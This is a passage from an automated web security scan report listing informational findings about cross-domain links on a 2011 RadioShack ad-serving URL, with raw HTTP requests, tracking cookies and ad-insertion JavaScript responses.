document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=394936567?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=394936567?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.115. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1326230958?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1326230958?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1326230958?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1326230958?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269957

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:04:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1326230958?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1326230958?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1326230958?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1326230958?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.116. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1781742657?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1781742657?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1781742657?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1781742657?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1781742657?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1781742657?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1781742657?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1781742657?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.117. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1170717655?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170717655?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170717655?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1170717655?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:32:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170717655?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170717655?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1170717655/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1170717655?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1170717655?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.118. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1542712710?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1542712710?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660; session=1296256112|1296260059

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:22:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1542712710?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1542712710/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1542712710?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1542712710?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.119. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/17341117772@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=703327951?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=703327951?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=703327951?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=703327951?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=34641373=_4d435dc4,7341117772,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=34641373/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/703327951/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=703327951?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
